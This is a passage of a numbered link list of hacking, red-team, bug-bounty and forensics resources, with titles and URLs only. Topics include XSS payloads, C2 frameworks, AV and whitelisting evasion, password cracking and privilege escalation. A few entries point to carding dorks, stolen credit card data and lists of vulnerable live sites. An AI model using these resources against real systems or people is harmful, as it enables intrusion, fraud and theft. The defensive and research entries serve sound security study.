Detection:\n\n\nhttps://0x00sec.org/t/userland-api-monitoring-and-code-injection-detection/5565\n\n\n-617-USE TOR. USE EMPIRE.:\n\n\nhttp://secureallthethings.blogspot.com/2016/11/use-tor-use-empire.html\n\n-617-ADVANCED CROSS SITE SCRIPTING (XSS) CHEAT SHEET:\n\n\nhttps://www.muhaddis.info/advanced-cross-site-scripting-xss-cheat-sheet/\n\n\n-618-Empire without PowerShell.exe:\n\n\nhttps://bneg.io/2017/07/26/empire-without-powershell-exe/\n\n\n-619-RED TEAM:\n\n\nhttps://bneg.io/category/red-team/\n\n\n-620-PDF Tools:\n\n\nhttps://blog.didierstevens.com/programs/pdf-tools/\n\n\n-621-DNS Data ex ltration — What is this and How to use?\n\n\nhttps://blog.fosec.vn/dns-data-exfiltration-what-is-this-and-how-to-use-2f6c69998822\n\n\n-621-Google Dorks:\n\n\nhttps://medium.com/p/7cfd432e0cf3\n\n\n-622-Hacking with JSP Shells:\n\n\nhttps://blog.netspi.com/hacking-with-jsp-shells/\n\n\n-623-Malware Analysis:\n\n\nhttps://github.com/RPISEC/Malware/raw/master/README.md\n\n\n-624-A curated list of Capture The Flag (CTF) frameworks, libraries, resources and softwares.:\n\n\nhttps://github.com/SandySekharan/CTF-tool\n\n\n-625-Group Policy Preferences:\n\n\nhttps://pentestlab.blog/2017/03/20/group-policy-preferences\n\n\n\n-627-CHECKING FOR MALICIOUSNESS IN AC OFORM OBJECTS ON PDF FILES:\n\n\nhttps://furoner.wordpress.com/2017/11/15/checking-for-maliciousness-in-acroform-objects-on-pdf-files\n\n\n-628-deobfuscation:\n\n\nhttps://furoner.wordpress.com/tag/deobfuscation/\n\n\n-629-POWERSHELL EMPIRE STAGERS 1: PHISHING WITH AN OFFICE\nMACRO AND EVADING AVS:\n\n\nhttps://fzuckerman.wordpress.com/2016/10/06/powershell-empire-stagers-1-phishing-with-an-office-macro-and-evading-avs/\n\n\n-630-A COMPREHENSIVE TUTORIAL ON CROSS-SITE SCRIPTING:\n\n\nhttps://fzuckerman.wordpress.com/2016/10/06/a-comprehensive-tutorial-on-cross-site-scripting/\n\n\n-631-GCAT – BACKDOOR EM PYTHON:\n\n\nhttps://fzuckerman.wordpress.com/2016/10/06/gcat-backdoor-em-python/\n\n\n-632-Latest Carding Dorks List for Sql njection 2019:\n\n\nhttps://latestechnews.com/carding-dorks/\n\n\n-633-google docs for credit card:\n\n\nhttps://latestechnews.com/tag/google-docs-for-credit-card/\n\n\n-634-How To Scan Multiple Organizations\nWith Shodan and Golang (OSINT):\n\n\nhttps://medium.com/p/d994ba6a9587\n\n-635-How to Evade Application\nWhitelisting Using REGSVR32:\n\n\nhttps://www.blackhillsinfosec.com/evade-application-whitelisting-using-regsvr32/\n\n\n-636-phishing:\n\n\nhttps://www.blackhillsinfosec.com/tag/phishing/\n\n\n-637-Merlin in action: Intro to Merlin:\n\n\nhttps://asciinema.org/a/ryljo8qNjHz1JFcFDK7wP6e9I\n\n\n-638-IP Cams from around the world:\n\n\nhttps://medium.com/p/a6f269f56805\n\n\n-639-Advanced Cross Site Scripting(XSS) Cheat Sheet by\nJaydeep Dabhi:\n\n\nhttps://jaydeepdabhi.wordpress.com/2016/01/12/advanced-cross-site-scriptingxss-cheat-sheet-by-jaydeep-dabhi/\n\n\n-640-Just how easy it is to do a domain or\nsubdomain take over!?:\n\n\nhttps://medium.com/p/265d635b43d8\n\n\n-641-How to Create hidden user in Remote PC:\n\n\nhttp://www.hackingarticles.in/create-hidden-remote-metaspolit\n\n\n-642-Process Doppelgänging – a new way to impersonate a process:\n\n\nhttps://hshrzd.wordpress.com/2017/12/18/process-doppelganging-a-new-way-to-impersonate-a-process/\n\n\n-643-How to turn a DLL into astandalone EXE:\n\n\nhttps://hshrzd.wordpress.com/2016/07/21/how-to-turn-a-dll-into-a-standalone-exe/\n\n\n-644-Hijacking extensions handlers as a malware persistence method:\n\n\nhttps://hshrzd.wordpress.com/2017/05/25/hijacking-extensions-handlers-as-a-malware-persistence-method/\n\n\n-645-I'll Get Your Credentials ... Later!:\n\n\nhttps://www.fuzzysecurity.com/tutorials/18.html\n\n\n-646-Game Over: CanYouPwnMe > Kevgir-1:\n\n\nhttps://www.fuzzysecurity.com/tutorials/26.html\n\n\n-647-IKARUS anti.virus and its 9 exploitable kernel vulnerabilities:\n\n\nhttp://www.greyhathacker.net/?p=995\n\n\n-648-Getting started in Bug Bounty:\n\n\nhttps://medium.com/p/7052da28445a\n\n\n-649-Union SQLi Challenges (Zixem Write-up):\n\n\nhttps://medium.com/ctf-writeups/union-sqli-challenges-zixem-write-up-4e74ad4e88b4?source=placement_card_footer_grid---------2-60\n\n\n-650-scanless – A Tool for Perform Anonymous Port Scan on Target Websites:\n\n\nhttps://gbhackers.com/scanless-port-scans-websites-behalf\n\n\n-651-WEBAPP PENTEST:\n\n\nhttps://securityonline.info/category/penetration-testing/webapp-pentest/\n\n\n-652-Cross-Site Scripting (XSS) Payloads:\n\n\nhttps://securityonline.info/tag/cross-site-scripting-xss-payloads/\n\n\n-653-sg1: swiss army knife for data encryption, exfiltration & covert communication:\n\n\nhttps://securityonline.info/tag/sg1/\n\n\n-654-NETWORK PENTEST:\n\n\nhttps://securityonline.info/category/penetration-testing/network-pentest/\n\n\n-655-SQL injection in an UPDATE query - a bug bounty story!:\n\n\nhttps://zombiehelp54.blogspot.com/2017/02/sql-injection-in-update-query-bug.html\n\n\n-656-Cross-site Scripting:\n\n\nhttps://www.netsparker.com/blog/web-security/cross-site-scripting-xss/\n\n\n-657-Local File Inclusion:\n\n\nhttps://www.netsparker.com/blog/web-security/local-file-inclusion-vulnerability/\n\n\n-658-Command Injection:\n\n\nhttps://www.netsparker.com/blog/web-security/command-injection-vulnerability/\n\n\n-659-a categorized list of Windows CMD commands:\n\n\nhttps://ss64.com/nt/commands.html\n\n\n-660-Understanding Guide for Nmap Timing Scan (Firewall Bypass):\n\n\nhttp://www.hackingarticles.in/understanding-guide-nmap-timing-scan-firewall-bypass\n\n\n-661-RFID Hacking with The Proxmark 3:\n\n\nhttps://blog.kchung.co/tag/rfid/\n\n\n-662-A practical guide to RFID badge copying:\n\n\nhttps://blog.nviso.be/2017/01/11/a-practical-guide-to-rfid-badge-copying\n\n\n-663-Denial of Service using Cookie Bombing:\n\n\nhttps://medium.com/p/55c2d0ef808c\n\n\n-664-Vultr Domain Hijacking:\n\n\nhttps://vincentyiu.co.uk/red-team/cloud-security/vultr-domain-hijacking\n\n\n-665-Command and Control:\n\n\nhttps://vincentyiu.co.uk/red-team/domain-fronting\n\n\n-666-Cisco Auditing Tool & Cisco Global Exploiter to Exploit 14 Vulnerabilities in Cisco Switches and Routers:\n\n\nhttps://gbhackers.com/cisco-global-exploiter-cge\n\n\n-667-CHECKING FOR MALICIOUSNESS IN ACROFORM OBJECTS ON PDF FILES:\n\n\nhttps://furoner.wordpress.com/2017/11/15/checking-for-maliciousness-in-acroform-objects-on-pdf-files\n\n\n\n-668-Situational Awareness:\n\n\nhttps://pentestlab.blog/2018/05/28/situational-awareness/\n\n\n-669-Unquoted Service Path:\n\n\nhttps://pentestlab.blog/2017/03/09/unquoted-service-path\n\n\n-670-NFS:\n\n\nhttps://pentestacademy.wordpress.com/2017/09/20/nfs/\n\n\n-671-List of Tools for Pentest Rookies:\n\n\nhttps://pentestacademy.wordpress.com/2016/09/20/list-of-tools-for-pentest-rookies/\n\n\n-672-Common Windows Commands for Pentesters:\n\n\nhttps://pentestacademy.wordpress.com/2016/06/21/common-windows-commands-for-pentesters/\n\n\n-673-Open-Source Intelligence (OSINT) Reconnaissance:\n\n\nhttps://medium.com/p/75edd7f7dada\n\n\n-674-OSINT x UCCU Workshop on Open Source Intelligence:\n\n\nhttps://www.slideshare.net/miaoski/osint-x-uccu-workshop-on-open-source-intelligence\n\n\n-675-Advanced Attack Techniques:\n\n\nhttps://www.cyberark.com/threat-research-category/advanced-attack-techniques/\n\n\n-676-Credential Theft:\n\n\nhttps://www.cyberark.com/threat-research-category/credential-theft/\n\n\n-678-The Cloud Shadow Admin Threat: 10 Permissions to Protect:\n\n\nhttps://www.cyberark.com/threat-research-blog/cloud-shadow-admin-threat-10-permissions-protect/\n\n\n-679-Online Credit Card Theft: Today’s Browsers Store Sensitive Information Deficiently, Putting User Data at Risk:\n\n\nhttps://www.cyberark.com/threat-research-blog/online-credit-card-theft-todays-browsers-store-sensitive-information-deficiently-putting-user-data-risk/\n\n\n-680-Weakness Within: Kerberos Delegation:\n\n\nhttps://www.cyberark.com/threat-research-blog/weakness-within-kerberos-delegation/\n\n\n-681-Simple Domain Fronting PoC with GAE C2 server:\n\n\nhttps://www.securityartwork.es/2017/01/31/simple-domain-fronting-poc-with-gae-c2-server/\n\n\n-682-Find Critical Information about a Host using DMitry:\n\n\nhttps://www.thehackr.com/find-critical-information-host-using-dmitry/\n\n\n-683-How To Do OS Fingerprinting In Kali Using Xprobe2:\n\n\nhttp://disq.us/?url=http%3A%2F%2Fwww.thehackr.com%2Fos-fingerprinting-kali%2F&key=scqgRVMQacpzzrnGSOPySA\n\n\n-684-Crack SSH, FTP, Telnet Logins Using Hydra:\n\n\nhttps://www.thehackr.com/crack-ssh-ftp-telnet-logins-using-hydra/\n\n\n-685-Reveal Saved Passwords in Browser using JavaScript Injection:\n\n\nhttps://www.thehackr.com/reveal-saved-passwords-browser-using-javascript-injection/\n\n\n-686-Nmap Cheat Sheet:\n\n\nhttps://s3-us-west-2.amazonaws.com/stationx-public-download/nmap_cheet_sheet_0.6.pdf\n\n\n-687-Manual Post Exploitation on Windows PC (Network Command):\n\n\n\nhttp://www.hackingarticles.in/manual-post-exploitation-windows-pc-network-command\n\n\n-688-Hack Gmail or Facebook Password of Remote PC using NetRipper Exploitation Tool:\n\n\nhttp://www.hackingarticles.in/hack-gmail-or-facebook-password-of-remote-pc-using-netripper-exploitation-tool\n\n\n-689-Hack Locked Workstation Password in Clear Text:\n\n\nhttp://www.hackingarticles.in/hack-locked-workstation-password-clear-text\n\n\n-690-How to Find ALL Excel, Office, PDF, and Images in Remote PC:\n\n\nhttp://www.hackingarticles.in/how-to-find-all-excel-office-pdf-images-files-in-remote-pc\n\n\n-691-red-teaming:\n\n\nhttps://www.redteamsecure.com/category/red-teaming/\n\n\n-692-Create a Fake AP and Sniff Data mitmAP:\n\n\nhttp://www.uaeinfosec.com/create-fake-ap-sniff-data-mitmap/\n\n\n-693-Bruteforcing From Nmap Output BruteSpray:\n\n\nhttp://www.uaeinfosec.com/bruteforcing-nmap-output-brutespray/\n\n\n-694-Reverse Engineering Framework radare2:\n\n\nhttp://www.uaeinfosec.com/reverse-engineering-framework-radare2/\n\n\n-695-Automated ettercap TCP/IP Hijacking Tool Morpheus:\n\n\nhttp://www.uaeinfosec.com/automated-ettercap-tcpip-hijacking-tool-morpheus/\n\n\n-696-List Of Vulnerable SQL Injection Sites:\n\n\nhttps://www.blogger.com/share-post.g?blogID=1175829128367570667&postID=4652029420701251199\n\n\n\n-697-Command and Control – Gmail:\n\n\nhttps://pentestlab.blog/2017/08/03/command-and-control-gmail/\n\n\n-698-Command and Control – DropBox:\n\n\nhttps://pentestlab.blog/2017/08/29/command-and-control-dropbox/\n\n\n-699-Skeleton Key:\n\n\nhttps://pentestlab.blog/2018/04/10/skeleton-key/\n\n\n-700-Secondary Logon Handle:\n\n\nhttps://pentestlab.blog/2017/04/07/secondary-logon-handle\n\n\n-701-Hot Potato:\n\n\nhttps://pentestlab.blog/2017/04/13/hot-potato\n\n\n-702-Leveraging INF-SCT Fetch & Execute Techniques For Bypass, Evasion, & Persistence (Part 2):\n\n\nhttps://bohops.com/2018/03/10/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence-part-2/\n\n\n-703-Linux-Kernel-exploits:\n\n\nhttp://tacxingxing.com/category/exploit/kernel-exploit/\n\n\n-704-Linux-Kernel-Exploit Stack Smashing:\n\n\nhttp://tacxingxing.com/2018/02/26/linuxkernelexploit-stack-smashing/\n\n\n-705-Linux Kernel Exploit Environment:\n\n\nhttp://tacxingxing.com/2018/02/15/linuxkernelexploit-huan-jing-da-jian/\n\n\n-706-Linux-Kernel-Exploit NULL dereference:\n\n\nhttp://tacxingxing.com/2018/02/22/linuxkernelexploit-null-dereference/\n\n\n-707-Apache mod_python for red teams:\n\nhttps://labs.nettitude.com/blog/apache-mod_python-for-red-teams/\n\n\n-708-Bounty Write-up (HTB):\n\n\nhttps://medium.com/p/9b01c934dfd2/\n\n\n709-CTF Writeups:\n\n\nhttps://medium.com/ctf-writeups\n\n\n-710-Detecting Malicious Microsoft Office Macro Documents:\n\n\nhttp://www.greyhathacker.net/?p=872\n\n\n\n-711-SQL injection in Drupal:\n\n\n\nhttps://hackerone.com/reports/31756\n\n\n-712-XSS and open redirect on Twitter:\n\n\nhttps://hackerone.com/reports/260744\n\n\n\n-713-Shopify login open redirect:\n\n\nhttps://hackerone.com/reports/55546\n\n\n-714-HackerOne interstitial redirect:\n\n\nhttps://hackerone.com/reports/111968\n\n\n-715-Ubiquiti sub-domain takeovers:\n\n\nhttps://hackerone.com/reports/181665\n\n\n-716-Scan.me pointing to Zendesk:\n\n\nhttps://hackerone.com/reports/114134\n\n\n-717-Starbucks' sub-domain takeover:\n\n\nhttps://hackerone.com/reports/325336\n\n\n-718-Vine's sub-domain takeover:\n\n\nhttps://hackerone.com/reports/32825\n\n\n-719-Uber's sub-domain takeover:\n\n\nhttps://hackerone.com/reports/175070\n\n\n\n-720-Read access to Google:\n\n\nhttps://blog.detectify.com/2014/04/11/how-we-got-read-access-on-googles-production-servers/\n\n\n-721-A Facebook XXE with Word:\n\n\nhttps://www.bram.us/2014/12/29/how-i-hacked-facebook-with-a-word-document/\n\n\n-722-The Wikiloc XXE:\n\n\nhttps://www.davidsopas.com/wikiloc-xxe-vulnerability/\n\n\n-723-Uber Jinja2 TTSI:\n\n\nhttps://hackerone.com/reports/125980\n\n\n-724-Uber Angular template injection:\n\n\nhttps://hackerone.com/reports/125027\n\n\n-725-Yahoo Mail stored XSS:\n\n\nhttps://klikki.fi/adv/yahoo2.html\n\n\n-726-Google image search XSS:\n\n\nhttps://mahmoudsec.blogspot.com/2015/09/how-i-found-xss-vulnerability-in-google.html\n\n\n-727-Shopify Giftcard Cart XSS :\n\n\nhttps://hackerone.com/reports/95089\n\n\n-728-Shopify wholesale XSS :\n\n\nhttps://hackerone.com/reports/106293\n\n\n-729-Bypassing the Shopify admin authentication:\n\n\nhttps://hackerone.com/reports/270981\n\n\n-730-Starbucks race conditions:\n\n\nhttps://sakurity.com/blog/2015/05/21/starbucks.html\n\n\n-731-Binary.com vulnerability – stealing a user's money:\n\n\nhttps://hackerone.com/reports/98247\n\n\n-732-HackerOne signal manipulation:\n\n\nhttps://hackerone.com/reports/106305\n\n\n-733-Shopify S buckets open:\n\n\nhttps://hackerone.com/reports/98819\n\n\n-734-HackerOne S buckets open:\n\n\nhttps://hackerone.com/reports/209223\n\n\n-735-Bypassing the GitLab 2F authentication:\n\n\nhttps://gitlab.com/gitlab-org/gitlab-ce/issues/14900\n\n\n-736-Yahoo PHP info disclosure:\n\n\nhttps://blog.it-securityguard.com/bugbounty-yahoo-phpinfo-php-disclosure-2/\n\n\n-737-Shopify for exporting installed users:\n\n\nhttps://hackerone.com/reports/96470\n\n\n-738-Shopify Twitter disconnect:\n\n\nhttps://hackerone.com/reports/111216\n\n\n-739-Badoo full account takeover:\n\n\nhttps://hackerone.com/reports/127703\n\n\n-740-Disabling PS Logging:\n\n\nhttps://github.com/leechristensen/Random/blob/master/CSharp/DisablePSLogging.cs\n\n\n-741-macro-less-code-exec-in-msword:\n\n\nhttps://sensepost.com/blog/2017/macro-less-code-exec-in-msword/\n\n\n-742-5 ways to Exploiting PUT Vulnerability:\n\n\nhttp://www.hackingarticles.in/5-ways-to-exploiting-put-vulnerabilit\n\n\n-743-5 Ways to Exploit Verb Tempering Vulnerability:\n\n\nhttp://www.hackingarticles.in/5-ways-to-exploit-verb-tempering-vulnerability\n\n\n-744-5 Ways to Hack MySQL Login Password:\n\n\nhttp://www.hackingarticles.in/5-ways-to-hack-mysql-login-password\n\n\n-745-5 Ways to Hack SMB Login Password:\n\n\nhttp://www.hackingarticles.in/5-ways-to-hack-smb-login-password\n\n\n-746-6 Ways to Hack FTP Login Password:\n\n\nhttp://www.hackingarticles.in/6-ways-to-hack-ftp-login-password\n\n\n-746-6 Ways to Hack SNMP Password:\n\n\nhttp://www.hackingarticles.in/6-ways-to-hack-snmp-password\n\n\n-747-6 Ways to Hack VNC Login Password:\n\n\nhttp://www.hackingarticles.in/6-ways-to-hack-vnc-login-password\n\n\n-748-Access Sticky keys Backdoor on Remote PC with Sticky Keys Hunter:\n\n\nhttp://www.hackingarticles.in/access-sticky-keys-backdoor-remote-pc-sticky-keys-hunter\n\n\n-749-Beginner Guide to IPtables:\n\n\nhttp://www.hackingarticles.in/beginner-guide-iptables\n\n\n-750-Beginner Guide to impacket Tool kit:\n\n\nhttp://www.hackingarticles.in/beginner-guide-to-impacket-tool-kit\n\n\n-751-Exploit Remote Windows 10 PC using Discover Tool:\n\n\nhttp://www.hackingarticles.in/exploit-remote-windows-10-pc-using-discover-tool\n\n\n-752-Forensics Investigation of Remote PC (Part 2):\n\n\nhttp://www.hackingarticles.in/forensics-investigation-of-remote-pc-part-2\n\n\n-753-5 ways to File upload vulnerability Exploitation:\n\n\nhttp://www.hackingarticles.in/5-ways-file-upload-vulnerability-exploitation\n\n\n-754-FTP Penetration Testing in Ubuntu (Port 21):\n\n\nhttp://www.hackingarticles.in/ftp-penetration-testing-in-ubuntu-port-21\n\n\n-755-FTP Penetration Testing on Windows (Port 21):\n\n\nhttp://www.hackingarticles.in/ftp-penetration-testing-windows\n\n\n-756-FTP Pivoting through RDP:\n\n\nhttp://www.hackingarticles.in/ftp-pivoting-rdp\n\n\n-757-Fun with Metasploit Payloads:\n\n\nhttp://www.hackingarticles.in/fun-metasploit-payloads\n\n\n-758-Gather Cookies and History of Mozilla Firefox in Remote Windows, Linux or MAC PC:\n\n\nhttp://www.hackingarticles.in/gather-cookies-and-history-of-mozilla-firefox-in-remote-windows-linux-or-mac-pc\n\n\n-759-Generating Reverse Shell using Msfvenom (One Liner Payload):\n\n\nhttp://www.hackingarticles.in/generating-reverse-shell-using-msfvenom-one-liner-payload\n\n\n-760-Generating Scan Reports Using Nmap (Output Scan):\n\n\nhttp://www.hackingarticles.in/generating-scan-reports-using-nmap-output-scan\n\n\n-761-Get Meterpreter Session of Locked PC Remotely (Remote Desktop Enabled):\n\n\nhttp://www.hackingarticles.in/get-meterpreter-session-locked-pc-remotely-remote-desktop-enabled\n\n\n-762-Hack ALL Security Features in Remote Windows 7 PC:\n\n\nhttp://www.hackingarticles.in/hack-all-security-features-in-remote-windows-7-pc\n\n\n-763-5 ways to Exploit LFi Vulnerability:\n\n\nhttp://www.hackingarticles.in/5-ways-exploit-lfi-vulnerability\n\n\n-764-5 Ways to Directory Bruteforcing on Web Server:\n\n\nhttp://www.hackingarticles.in/5-ways-directory-bruteforcing-web-server\n\n\n-765-Hack Call Logs, SMS, Camera of Remote Android Phone using Metasploit:\n\n\nhttp://www.hackingarticles.in/hack-call-logs-sms-camera-remote-android-phone-using-metasploit\n\n\n-766-Hack Gmail and Facebook Password in Network using Bettercap:\n\n\nhttp://www.hackingarticles.in/hack-gmail-facebook-password-network-using-bettercap\n\n\n-767-ICMP Penetration Testing:\n\n\nhttp://www.hackingarticles.in/icmp-penetration-testing\n\n\n-768-Understanding Guide to Mimikatz:\n\n\nhttp://www.hackingarticles.in/understanding-guide-mimikatz\n\n\n-769-5 Ways to Create Dictionary for Bruteforcing:\n\nhttp://www.hackingarticles.in/5-ways-create-dictionary-bruteforcing\n\n\n-770-Linux Privilege Escalation using LD_Preload:\n\n\nhttp://www.hackingarticles.in/linux-privilege-escalation-using-ld_preload/\n\n\n-771-2 Ways to Hack Remote Desktop Password using kali Linux:\n\n\nhttp://www.hackingarticles.in/2-ways-to-hack-remote-desktop-password-using-kali-linux\n\n\n-772-2 ways to use Msfvenom Payload with Netcat:\n\n\nhttp://www.hackingarticles.in/2-ways-use-msfvenom-payload-netcat\n\n\n-773-4 ways to Connect Remote PC using SMB Port:\n\n\nhttp://www.hackingarticles.in/4-ways-connect-remote-pc-using-smb-port\n\n\n-774-4 Ways to DNS Enumeration:\n\n\nhttp://www.hackingarticles.in/4-ways-dns-enumeration\n\n\n-775-4 Ways to get Linux Privilege Escalation:\n\n\nhttp://www.hackingarticles.in/4-ways-get-linux-privilege-escalation\n\n\n-776-101+ OSINT Resources for Investigators [2019]:\n\n\nhttps://i-sight.com/resources/101-osint-resources-for-investigators/\n\n\n-777-Week in OSINT #2019–02:\n\n\nhttps://medium.com/week-in-osint/week-in-osint-2019-02-d4009c27e85f\n\n\n-778-OSINT Cheat Sheet:\n\n\nhttps://hack2interesting.com/osint-cheat-sheet/\n\n\n-779-OSINT Cheat Sheet:\n\n\nhttps://infoskirmish.com/osint-cheat-sheet/\n\n\n-780-OSINT Links for Investigators:\n\nhttps://i-sight.com/resources/osint-links-for-investigators/\n\n\n-781- Metasploit Cheat Sheet :\n\n\nhttps://www.kitploit.com/2019/02/metasploit-cheat-sheet.html\n\n\n-782- Exploit Development Cheat Sheet:\n\n\nhttps://github.com/coreb1t/awesome-pentest-cheat-sheets/commit/5b83fa9cfb05f4774eb5e1be2cde8dbb04d011f4\n\n\n-783-Building Profiles for a Social Engineering Attack:\n\n\nhttps://pentestlab.blog/2012/04/19/building-profiles-for-a-social-engineering-attack/\n\n\n-784-Practical guide to NTLM Relaying in 2017 (A.K.A getting a foothold in under 5 minutes):\n\n\nhttps://byt3bl33d3r.github.io/practical-guide-to-ntlm-relaying-in-2017-aka-getting-a-foothold-in-under-5-minutes.html\n\n\n-785-Getting the goods with CrackMapExec: Part 2:\n\n\nhttps://byt3bl33d3r.github.io/tag/crackmapexec.html\n\n\n-786-Bug Hunting Methodology (part-1):\n\n\nhttps://medium.com/p/91295b2d2066\n\n-787-Exploring Cobalt Strike's ExternalC2 framework:\n\n\nhttps://blog.xpnsec.com/exploring-cobalt-strikes-externalc2-framework/\n\n\n-788-Airbnb – When Bypassing JSON Encoding, XSS Filter, WAF, CSP, and Auditor turns into Eight Vulnerabilities:\n\n\nhttps://buer.haus/2017/03/08/airbnb-when-bypassing-json-encoding-xss-filter-waf-csp-and-auditor-turns-into-eight-vulnerabilities/\n\n\n-789-Adversarial Tactics, Techniques & Common Knowledge:\n\n\nhttps://attack.mitre.org/wiki/Main_Page\n\n\n-790-Bug Bounty — Tips / Tricks / JS (JavaScript Files):\n\n\nhttps://medium.com/p/bdde412ea49d\n\n\n-791-Bug Bounty Hunting Tips #2 —Target their mobile apps (Android Edition):\n\n\nhttps://medium.com/p/f88a9f383fcc\n\n\n\n-792-DiskShadow: The Return of VSS Evasion, Persistence, and Active Directory\nDatabase Extraction:\n\n\nhttps://bohops.com/2018/03/26/diskshadow-the-return-of-vss-evasion-persistence-and-active-directory-database-extraction/\n\n\n-793-Executing Commands and Bypassing AppLocker with PowerShell Diagnostic Scripts:\n\n\nhttps://bohops.com/2018/01/07/executing-commands-and-bypassing-applocker-with-powershell-diagnostic-scripts/\n\n\n-794-ClickOnce (Twice or Thrice): A Technique for Social Engineering and (Un)trusted Command Execution:\n\n\nhttps://bohops.com/2017/12/02/clickonce-twice-or-thrice-a-technique-for-social-engineering-and-untrusted-command-execution/\n\n\n-795-Leveraging INF-SCT Fetch & Execute Techniques For Bypass, Evasion, & Persistence (Part 2):\n\n\nhttps://bohops.com/2018/03/10/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence-part-2/\n\n\n-796-DiskShadow: The Return of VSS Evasion, Persistence, and Active Directory Database Extraction:\n\n\nhttps://bohops.com/2018/03/26/diskshadow-the-return-of-vss-evasion-persistence-and-active-directory-database-extraction/\n\n\n-797-Trust Direction: An Enabler for Active Directory Enumeration and Trust Exploitation:\n\n\nhttps://bohops.com/2017/12/02/trust-direction-an-enabler-for-active-directory-enumeration-and-trust-exploitation/\n\n\n-798-DiskShadow: The Return of VSS Evasion, Persistence, and Active Directory Database Extraction:\n\n\nhttps://bohops.com/2018/03/26/diskshadow-the-return-of-vss-evasion-persistence-and-active-directory-database-extraction/\n\n\n\n-799-Abusing Exported Functions and Exposed DCOM Interfaces for Pass-Thru Command Execution and Lateral Movement:\n\n\nhttps://bohops.com/2018/03/17/abusing-exported-functions-and-exposed-dcom-interfaces-for-pass-thru-command-execution-and-lateral-movement/\n\n\n-800-Capcom Rootkit Proof-Of-Concept:\n\n\nhttps://www.fuzzysecurity.com/tutorials/28.html\n\n\n-801-Linux Privilege Escalation using Misconfigured NFS:\n\n\nhttp://www.hackingarticles.in/linux-privilege-escalation-using-misconfigured-nfs/\n\n\n-802-Beginners Guide for John the Ripper (Part 1):\n\n\nhttp://www.hackingarticles.in/beginner-guide-john-the-ripper-part-1/\n\n\n-803-Working of Traceroute using Wireshark:\n\n\nhttp://www.hackingarticles.in/working-of-traceroute-using-wireshark/\n\n\n-804-Multiple Ways to Get root through Writable File:\n\n\nhttp://www.hackingarticles.in/multiple-ways-to-get-root-through-writable-file/\n\n\n-805-4 ways to SMTP Enumeration:\n\n\nhttp://www.hackingarticles.in/4-ways-smtp-enumeration\n\n\n-806-4 ways to Hack MS SQL Login Password:\n\n\nhttp://www.hackingarticles.in/4-ways-to-hack-ms-sql-login-password\n\n\n-807-4 Ways to Hack Telnet Passsword:\n\n\nhttp://www.hackingarticles.in/4-ways-to-hack-telnet-passsword\n\n\n-808-5 ways to Brute Force Attack on WordPress Website:\n\n\nhttp://www.hackingarticles.in/5-ways-brute-force-attack-wordpress-website\n\n\n-809-5 Ways to Crawl a Website:\n\n\nhttp://www.hackingarticles.in/5-ways-crawl-website\n\n\n-810-Local Linux Enumeration & Privilege Escalation Cheatsheet:\n\n\nhttps://www.rebootuser.com/?p=1623\n\n\n-811-The Drebin Dataset:\n\n\nhttps://www.sec.cs.tu-bs.de/~danarp/drebin/download.html\n\n\n-812-ECMAScript 6 from an Attacker's Perspective - Breaking Frameworks, Sandboxes, and everything else:\n\n\nhttps://www.slideshare.net/x00mario/es6-en\n\n\n-813-IT and Information Security Cheat Sheets:\n\n\nhttps://zeltser.com/cheat-sheets/\n\n\n-814-Cheat Sheets - DFIR Training:\n\n\nhttps://www.dfir.training/cheat-sheets\n\n\n-815-WinDbg Malware Analysis Cheat Sheet:\n\n\nhttps://oalabs.openanalysis.net/2019/02/18/windbg-for-malware-analysis/\n\n\n-819-Cheat Sheet for Analyzing Malicious Software:\n\n\nhttps://www.prodefence.org/cheat-sheet-for-analyzing-malicious-software/\n\n\n-820-Analyzing Malicious Documents Cheat Sheet - Prodefence:\n\n\nhttps://www.prodefence.org/analyzing-malicious-documents-cheat-sheet-2/\n\n\n-821-Cheat Sheets - SANS Digital Forensics:\n\n\nhttps://digital-forensics.sans.org/community/cheat-sheets\n\n\n-822-Linux Command Line Forensics and Intrusion Detection Cheat Sheet:\n\n\nhttps://www.sandflysecurity.com/blog/compromised-linux-cheat-sheet/\n\n\n-823-Windows Registry Auditing Cheat Sheet:\n\n\nhttps://www.slideshare.net/Hackerhurricane/windows-registry-auditing-cheat-sheet-ver-jan-2016-malwarearchaeology\n\n\n-824-Cheat Sheet of Useful Commands Every Kali Linux User Needs To Know:\n\n\nhttps://kennyvn.com/cheatsheet-useful-bash-commands-linux/\n\n\n-825-kali-linux-cheatsheet:\n\n\nhttps://github.com/NoorQureshi/kali-linux-cheatsheet\n\n\n-826-8 Best Kali Linux Terminal Commands used by Hackers (2019 Edition):\n\n\nhttps://securedyou.com/best-kali-linux-commands-terminal-hacking/\n\n\n-827-Kali Linux Commands Cheat Sheet:\n\n\nhttps://www.pinterest.com/pin/393431717429496576/\n\n\n-827-Kali Linux Commands Cheat Sheet A To Z:\n\n\nhttps://officialhacker.com/linux-commands-cheat-sheet/\n\n\n-828-Linux commands CHEATSHEET for HACKERS:\n\n\nhttps://www.reddit.com/r/Kalilinux/.../linux_commands_cheatsheet_for_hackers/\n\n\n-829-100 Linux Commands – A Brief Outline With Cheatsheet:\n\n\nhttps://fosslovers.com/100-linux-commands-cheatsheet/\n\n\n-830-Kali Linux – Penetration Testing Cheat Sheet:\n\n\nhttps://uwnthesis.wordpress.com/2016/06/.../kali-linux-penetration-testing-cheat-sheet/\n\n\n\n-831-Basic Linux Terminal Shortcuts Cheat Sheet :\n\n\nhttps://computingforgeeks.com/basic-linux-terminal-shortcuts-cheat-sheet/\n\n\n-832-List Of 220+ Kali Linux and Linux Commands Line {Free PDF} :\n\n\nhttps://itechhacks.com/kali-linux-and-linux-commands/\n\n\n-833-Transferring files from Kali to Windows (post exploitation):\n\n\nhttps://blog.ropnop.com/transferring-files-from-kali-to-windows/\n\n\n-834-The Ultimate Penetration Testing Command Cheat Sheet for Kali Linux:\n\n\nhttps://www.hostingland.com/.../the-ultimate-penetration-testing-command-cheat-sheet\n\n\n-835-What is penetration testing? 10 hacking tools the pros use:\n\n\nhttps://www.csoonline.com/article/.../17-penetration-testing-tools-the-pros-use.html\n\n\n-836-Best Hacking Tools List for Hackers & Security Professionals in 2019:\n\n\nhttps://gbhackers.com/hacking-tools-list/\n\n\n-837-ExploitedBunker PenTest Cheatsheet:\n\nhttps://exploitedbunker.com/articles/pentest-cheatsheet/\n\n\n-838-How to use Zarp for penetration testing:\n\n\nhttps://www.techrepublic.com/article/how-to-use-zarp-for-penetration-testing/\n\n\n-839-Wireless Penetration Testing Cheat 